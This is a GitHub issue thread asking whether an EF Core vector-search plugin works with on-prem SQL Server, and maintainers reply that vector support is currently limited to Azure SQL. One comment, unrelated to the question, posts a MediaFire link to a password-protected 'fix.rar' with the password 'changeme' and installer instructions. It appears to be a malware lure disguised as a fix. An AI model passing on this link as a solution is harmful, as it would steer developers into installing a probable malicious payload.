### ISSUE TITLE
Support for On-Prem SQL Server

### ISSUE THREAD

**Issue by ghost** [efcore/EFCore.SqlServer.VectorSearch#2]
Hello,

Does that only works with Azure SQL Server or Vector is supported in On-Prem SQL Server aswel?

Thanks

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcominerva** [comment]
Currently, Vector is supported in Early Adopted Preview on Azure SQL Database (https://devblogs.microsoft.com/azure-sql/announcing-eap-native-vector-support-in-azure-sql-database) and Azure SQL Managed Instance (https://devblogs.microsoft.com/azure-sql/vector-support-eap-extended-to-azure-sql-mi).

**Comment by roji** [comment]
@isaranghi AFAIK the vector support should be out for the next version of on-prem SQL Server, but until then is only supported on Azure SQL. You can ask on SQL Server forums to get more information on the server support side; once support is available, this plugin should work out-of-the-box with it.
